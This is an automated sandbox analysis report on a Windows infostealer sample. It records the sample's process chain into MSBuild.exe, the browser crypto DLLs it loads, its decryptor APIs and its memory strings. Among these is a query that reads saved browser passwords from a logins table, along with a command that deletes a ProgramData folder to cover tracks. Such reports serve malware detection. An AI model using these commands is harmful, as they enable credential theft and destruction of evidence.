Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE11C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE1395E appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE13AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE11F5A appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FE1415B appears 133 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 1FFF06B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00402000 appears 287 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: String function: 6C4C09D0 appears 57 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: String function: 6C2D94D0 appears 90 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: String function: 003D2000 appears 287 times
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: String function: 6C2CCBE8 appears 134 times

Sample file is different than original file name gathered from version info

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2191144720.000000003B838000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207383675.000000006C515000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2197298605.0000000047710000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2206892942.000000006C322000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Uses 32bit PE files

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ed93c8.1.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.53b0000.13.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.2ec49a0.0.raw.unpack, fDX9tehJ5EFemhKZwc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.EHDHIDAEHC.exe.40d0dd0.11.raw.unpack, RnDmD.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/24@3/4

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_6C2F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C2F7030

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E1400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,

0_2_003E1400

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E0900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

0_2_003E0900

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199747278259[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
Source: C:\ProgramData\EHDHIDAEHC.exe	Mutant created: NULL

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2207204540.000000006C4CF000.00000002.00000001.01000000.00000007.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864080722.0000000003305000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864176505.000000000331C000.00000004.00000020.00020000.00000000.sdmp, ECFHJK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181684903.0000000025178000.00000002.00001000.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2181945016.00000000276BB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2356461481.0000000020028000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2349842336.000000001A0B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Virustotal: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe "C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe"
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe"
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Section loaded: msasn1.dll	Jump to behavior
